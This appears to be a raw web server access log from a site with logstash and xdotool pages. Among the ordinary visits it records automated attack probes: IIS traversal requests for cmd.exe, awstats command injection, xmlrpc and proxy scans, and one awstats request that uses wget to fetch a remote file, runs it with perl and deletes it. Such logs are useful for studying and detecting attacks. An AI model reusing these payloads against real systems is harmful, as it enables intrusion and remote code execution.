POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 1062 "-" "-"
GET /blog/tags/firewall HTTP/1.1" 200 13233 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
POST /blog/xmlrpc.php HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /favicon.ico HTTP/1.1" 200 3638 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
GET /sumthin HTTP/1.0" 404 296 "-" "-"
GET http://www.jxceramic.com/cgi-bin/proxy.cgi HTTP/1.0" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
CONNECT 68.142.202.12:25 HTTP/1.1" 405 306 "-" "-"
POST /b2evo/xmlsrv/xmlrpc.php HTTP/1.1" 404 301 "-" "-"
POST /blog/xmlrpc.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /wordpress/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
OPTIONS / HTTP/1.1" 200 0 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /blog/tags/c++ HTTP/1.0" 200 27925 "http://www.semicomplete.com/blog/tags/year%20review" "Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)"
GET http://www.ebay.com/ HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
POST /xmlrpc.php HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET //cgi-bin/awstats.pl HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /sumthin HTTP/1.0" 404 296 "-" "-"
POST /xmlrpc.php HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /presentations/logstash-1/ HTTP/1.0" 200 53270 "http://www.semicomplete.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:22.0) Gecko/20100101 Firefox/22.0"
GET /images/web/2009/banner.png HTTP/1.1" 200 52315 "http://www.semicomplete.com/projects/keynav/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
GET /sumthin HTTP/1.0" 404 296 "-" "-"
POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
GET / HTTP/1.0" 403 3931 "-" "-"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
GET /presentations/logstash-metrics-sf-2012.10/images/apache-negative-duration.png HTTP/1.1" 200 97173 "http://semicomplete.com/presentations/logstash-metrics-sf-2012.10/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/32.0.1700.102 Chrome/32.0.1700.102 Safari/537.36"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
POST /xmlrpc.php HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
GET //stats/awstats.pl HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
GET /thisdoesnotexistahaha.php HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
POST /blogs/xmlrpc.php HTTP/1.1" 404 294 "-" "-"
POST /xmlrpc.php HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /cgi-bin/openwebmail/openwebmail.pl HTTP/1.0" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
POST /xmlrpc.php HTTP/1.1" 404 289 "-" "-"
GET /sumthin HTTP/1.0" 404 296 "-" "-"
CONNECT 66.135.208.90:80 HTTP/1.1" 405 306 "-" "-"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
POST /drupal/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
CONNECT p10.d2g.com:25 HTTP/1.0" 405 304 "-" "-"
POST /wordpress/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /images/jordan-80.png HTTP/1.1" 200 6146 "http://www.semicomplete.com/projects/xdotool/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
GET //cgi-bin/cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 1050 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
GET /sumthin HTTP/1.0" 404 296 "-" "-"
POST /wordpress/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET //cgi-bin2/awstats/awstats.pl HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
GET /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
GET http://www.tech-guide.info/cgi-bin/prxjdg.cgi HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)"
POST /xmlrpc.php HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /xmlrpc.php HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /xmlrpc.php HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /presentations/logstash-scale11x/css/reveal.min.css HTTP/1.1" 200 23581 "http://semicomplete.com/presentations/logstash-scale11x/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
GET http://ad.trafficmp.com/tmpad/banner/ad/tmp.asp?poID=el0w HTTP/1.0" 404 1187 "http://www.besteach.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)"
GET /phpgroupware/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
GET /presentations/logstash-puppetconf-2012/lib/js/head.min.js HTTP/1.1" 200 3170 "http://semicomplete.com/presentations/logstash-puppetconf-2012/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.73.11 (KHTML, like Gecko) Version/6.1.1 Safari/537.73.11"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
GET /cgi-bin/WebApp.pl HTTP/1.0" 404 306 "-" "-"
GET / HTTP/1.0" 403 3931 "-" "-"
POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
GET / HTTP/1.0" 403 3931 "-" "-"
GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 1051 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
GET /sumthin HTTP/1.0" 404 296 "-" "-"
GET /images/jordan-80.png HTTP/1.1" 200 6146 "http://www.semicomplete.com/blog/tags/wmi" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
GET /style2.css HTTP/1.1" 200 4877 "http://www.semicomplete.com/blog/tags/jquery%20mobile" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
POST /xmlrpc.php HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /blog/xmlrpc.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /blog/geekery/xvfb-firefox.html HTTP/1.1" 200 10975 "-" "Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http://siteexplorer.info/)"
GET /blog/geekery/storageutils-db-graphs-etc.html HTTP/1.0" 200 10167 "http://www.semicomplete.com/blog/tags/year%20review" "Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)"
GET /blog/tags/puppet?flav=rss20 HTTP/1.1" 200 14872 "-" "UniversalFeedParser/4.2-pre-314-svn +http://feedparser.org/"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
POST /blog/xmlrpc.php HTTP/1.1" 404 293 "-" "-"
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
POST /drupal/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /blog/xmlrpc.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /reset.css HTTP/1.1" 200 1015 "http://www.semicomplete.com/projects/xdotool/" "Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0"
POST /xmlrpc.php HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET / HTTP/1.0" 403 3931 "-" "-"
POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /projects/xdotool/xdotool.xhtml HTTP/1.1" 200 50112 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36 slurp"
GET / HTTP/1.1" 403 2898 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
GET /misc/sample.log HTTP/1.0" 200 54306753 "http://www.semicomplete.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:22.0) Gecko/20100101 Firefox/22.0"
GET /board/ HTTP/1.1" 200 554 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; .NET CLR 1.0.3705)"
GET /favicon.ico HTTP/1.1" 200 3638 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:27.0) Gecko/20100101 Firefox/27.0"
POST /drupal/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /xmlrpc.php HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /wordpress/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /favicon.ico HTTP/1.1" 200 3638 "-" "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google favicon"
GET /presentations/logstash-puppetconf-2012/images/nagios-sms6.png HTTP/1.1" 200 82859 "http://semicomplete.com/presentations/logstash-puppetconf-2012/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
GET /blog/rants/blogging-code-of-conduct.html HTTP/1.1" 200 11981 "-" "Mozilla/5.0 (compatible; Ezooms/1.0; help@moz.com)"
GET /images/jordan-80.png HTTP/1.1" 200 6146 "http://www.semicomplete.com/blog/tags/X11" "SAMSUNG-GT-E2232/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0"
POST /xmlrpc.php HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET / HTTP/1.0" 403 3931 "-" "-"
POST /community/xmlrpc.php HTTP/1.1" 404 299 "-" "-"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /articles HTTP/1.1" 301 323 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 297 "-" "-"
GET /presentations/logstash-scale11x/images/kibana-dashboard.png HTTP/1.1" 200 321631 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET / HTTP/1.0" 403 3931 "-" "-"
GET /presentations/logstash-scale11x/images/logstash.png HTTP/1.1" 200 47731 "http://kufli.blogspot.com.au/2013/07/log-analysis-using-logstash.html" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
POST /wordpress/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET //cp/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 1050 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
GET http://217.106.232.38/default.shtml HTTP/1.0" 404 293 "-" "-"
GET /presentations/logstash-monitorama-2013/plugin/markdown/markdown.js HTTP/1.1" 200 1187 "http://semicomplete.com/presentations/logstash-monitorama-2013/" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+ver HTTP/1.0" 404 1061 "-" "-"
GET /blog/xmlrpc.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
GET / HTTP/1.0" 403 3931 "-" "-"
GET /files/logstash/logstash-1.3.2-monolithic.jar HTTP/1.1" 404 324 "-" "Chef Client/10.18.2 (ruby-1.9.3-p327; ohai-6.16.0; x86_64-linux; +http://opscode.com)"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
GET /presentations/logstash-puppetconf-2012/images/psychoaxe.jpg HTTP/1.1" 200 29179 "http://semicomplete.com/presentations/logstash-puppetconf-2012/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.73.11 (KHTML, like Gecko) Version/6.1.1 Safari/537.73.11"
GET / HTTP/1.0" 403 3931 "-" "-"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
GET / HTTP/1.0" 403 3931 "-" "-"
GET /style2.css HTTP/1.1" 200 4877 "http://www.semicomplete.com/articles/arp-security/" "Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
GET /favicon.ico HTTP/1.1" 200 3638 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.91 Safari/537.36"
GET / HTTP/1.0" 403 2898 "-" "-"
GET /files/dynamic-dns-with-dhcp/dhcpd.conf HTTP/1.1" 200 2269 "http://www.semicomplete.com/articles/dynamic-dns-with-dhcp/" "Mozilla/5.0 (X11; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0"
GET /webcalendar/tools/send_reminders.php HTTP/1.1" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /blog/xmlrpc.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /presentations/logstash-scale11x/images/logstash.png HTTP/1.1" 200 47731 "http://kufli.blogspot.com/2013/07/log-analysis-using-logstash.html" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
GET /favicon.ico HTTP/1.1" 200 3638 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
GET /presentations/logstash-puppetconf-2012/lib/css/zenburn.css HTTP/1.1" 200 1791 "http://semicomplete.com/presentations/logstash-puppetconf-2012/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /presentations/logstash-preso-1.0/images/ahhh___rage_face_by_samusmmx-d5g5zap.png HTTP/1.1" 200 175208 "http://www.google.fr/imgres?safe=active&rlz=1C1GGGE_frFR372&espvd=210&es_sm=122&biw=1680&bih=925&tbm=isch&tbnid=R12t1E-Ol4AzhM%3A&imgrefurl=http%3A%2F%2Fwww.semicomplete.com%2Fpresentations%2Flogstash-preso-1.0%2F&docid=IhBOsaO4IbjvoM&imgurl=http%3A%2F%2Fwww.semicomplete.com%2Fpresentations%2Flogstash-preso-1.0%2Fimages%2Fahhh___rage_face_by_samusmmx-d5g5zap.png&w=576&h=570&ei=exwBU6HBFKbB0QWPpoDYDg&zoom=1&iact=rc&dur=1114&page=1&start=0&ndsp=46&ved=0CIsBEK0DMBI" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
POST /xmlrpc.php HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
CONNECT 68.142.202.12:25 HTTP/1.1" 405 306 "-" "-"
CONNECT 68.142.226.43:80 HTTP/1.1" 405 306 "-" "-"
POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /xmlrpc.php HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 1050 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
POST /drupal/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET http://www.msn.com/ HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
GET /cacti/graph_image.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
GET /wp-login.php?action=register HTTP/1.0" 404 296 "http://www.semicomplete.com/misc/sample.log" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:22.0) Gecko/20100101 Firefox/22.0"
GET /sumthin HTTP/1.0" 404 296 "-" "-"
POST /drupal/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /blog/geekery/grok-pattern-autodiscovery HTTP/1.0" 200 12851 "http://www.semicomplete.com/blog/tags/year%20review" "Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)"
GET /projects/xdotool/ HTTP/1.1" 200 12292 "http://www.google.co.uk/url?sa=t&rct=j&q=xdotool%20command%20mac&source=web&cd=2&ved=0CDMQFjAB&url=http%3A%2F%2Fwww.semicomplete.com%2Fprojects%2Fxdotool%2F&ei=yCYBU-DdGcqThQeOhYCYDQ&usg=AFQjCNE3V_aCf3-gfNcbS924S6jZ6FqffA&bvm=bv.61535280,d.ZG4" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10"
POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /?flav=atom HTTP/1.1" 200 32352 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 16 subscribers; feed-id=3389821348893992437)"
POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
GET /files/logstash/logstash-1.1.0-monolithic.jar HTTP/1.1" 200 40923996 "http://logstash.net/docs/1.1.0/tutorials/getting-started-centralized" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101 Firefox/25.0"
POST /xmlrpc.php HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
GET /thisdoesnotexistahaha.php HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /scripts/?C=M;O=A HTTP/1.1" 200 21894 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
GET /Calendar/tools/send_reminders.php HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
GET /cacti/graph_image.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET / HTTP/1.0" 403 3931 "-" "-"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
GET /favicon.ico HTTP/1.1" 200 3638 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:27.0) Gecko/20100101 Firefox/27.0"
GET / HTTP/1.0" 403 3931 "-" "-"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET /presentations/logstash-puppetconf-2012/images/psychoaxe.jpg HTTP/1.1" 200 29179 "http://semicomplete.com/presentations/logstash-puppetconf-2012/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; MS-RTC LM 8; InfoPath.3)"
POST /xmlrpc.php HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
POST /xmlrpc.php HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
GET / HTTP/1.1" 403 2898 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
GET //cp/awstats/awstats.pl HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
GET /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;wget%20http://www.steeltalking.com/blog//images/crond;perl%20crond;rm%20-rf%20crond;pwd%20;echo%20;echo| HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+ver HTTP/1.0" 404 330 "-" "-"
GET / HTTP/1.1" 403 3931 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
GET /blog/geekery/disabling-battery-in-ubuntu-vms.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+semicomplete%2Fmain+%28semicomplete.com+-+Jordan+Sissel%29 HTTP/1.1" 200 9316 "-" "Tiny Tiny RSS/1.11 (http://tt-rss.org/)"
